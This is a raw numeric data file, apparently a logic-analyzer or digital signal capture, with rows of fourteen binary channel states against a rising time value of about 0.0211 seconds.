0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1106348e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106368e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1106428e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106448e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1106468e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106492e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1106500e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1106540e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1106560e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106572e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1106584e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106604e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1106628e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106652e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1106696e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106716e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1106764e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106788e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,2.1106792e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1106796e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1106808e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1106828e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1106852e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1106876e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1106900e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1106920e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1106944e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1106964e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,2.1106972e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106976e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107012e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107036e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107056e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107080e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107084e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1107132e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107156e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107164e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107204e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107228e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107236e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1107256e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107280e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1107308e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107332e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1107356e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107380e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107388e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107432e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107456e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107480e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107508e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1107532e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107556e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1107604e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107628e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1107656e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107680e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1107708e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1107732e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,2.1107736e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107740e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107756e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107780e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107804e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107856e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107880e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107908e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107932e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1107956e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1107980e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108032e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108056e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1108060e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1108108e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1108132e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108140e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108188e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108212e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108236e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108260e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108284e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108312e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1108316e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1108364e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1108388e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108396e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108444e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,2.1108468e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1108472e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1108492e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1108516e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1108540e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1108564e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1108588e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1108616e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108620e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108668e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108692e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108716e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108740e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108764e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108788e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108816e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108840e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108868e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108892e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108916e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108940e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1108964e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1108988e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109016e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109040e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109068e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109092e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109116e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109140e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109168e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109188e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109220e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109240e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,2.1109244e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109248e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1109292e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109316e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109340e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109364e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109388e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109420e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109440e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109468e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109516e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109540e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109548e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1109564e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109588e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1109620e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109640e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1109668e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109692e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1109716e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109740e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109748e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109792e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1109816e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1109840e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109868e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1109892e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109916e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1109964e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1109988e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1110016e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1110040e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1110068e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1110092e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,2.1110096e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110100e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110116e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110140e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110164e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110188e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110216e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110240e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110268e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110292e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110316e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110340e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110364e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110388e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110416e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110440e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110468e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110492e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110516e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110540e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110564e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110588e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110644e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1110668e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1110692e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1110716e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1110740e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1110764e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1110788e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1110816e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1110840e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1110868e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110872e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110916e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110940e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1110964e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1110988e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111044e-02 0,0,0,0,1,0,0,0,0,1,0,0,0,0,2.1111068e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1111072e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1111092e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1111116e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1111140e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1111164e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1111188e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1111216e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1111240e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1111268e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111272e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111316e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111340e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111364e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111388e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111416e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111440e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111468e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111492e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111516e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111540e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111564e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111588e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111616e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111640e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111668e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111692e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111716e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111740e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111764e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111788e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111816e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111840e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111868e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111892e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111916e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111940e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1111964e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1111988e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112016e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112040e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112068e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112092e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112116e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112140e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112164e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112188e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112216e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112240e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112268e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112292e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112316e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112340e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112364e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112388e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112416e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112440e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112468e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112492e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112516e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112540e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112564e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112588e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112616e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112640e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112668e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112692e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112716e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112740e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112764e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112788e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112816e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1112840e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1112868e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1112892e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.1237292e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.1237500e-02 1,0,0,0,1,1,0,0,0,1,0,1,0,1,2.1237532e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.1237556e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,1,2.1237876e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.1237900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1237908e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.1237924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1237948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.1237980e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1238000e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.1238028e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1238052e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.1238076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1238100e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238148e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238180e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238200e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238228e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238252e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238276e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238300e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238348e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1238356e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1238404e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1238428e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.1238432e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238436e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238548e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238576e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1238580e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1238628e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1238652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238660e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238700e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238724e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238748e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238776e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238800e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238828e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,2.1238852e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1238856e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1238876e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1238900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238908e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1238924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1238948e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1238956e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1239004e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239028e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1239052e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239084e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239124e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239148e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239176e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239200e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239228e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1239276e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239308e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239348e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239376e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239400e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239404e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1239452e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239476e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239484e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239548e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239576e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239600e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239628e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239676e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239776e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1239800e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239828e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1239852e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239876e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1239900e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239924e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1239948e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1239976e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1239980e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240028e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240052e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240100e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1240108e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1240152e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1240176e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1240200e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1240228e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.1240232e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240236e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240324e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240348e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240376e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1240380e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1240428e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1240452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240460e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240476e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240500e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240524e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240548e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240576e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240600e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240628e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240652e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240700e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240724e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240748e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240776e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240800e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240828e-02 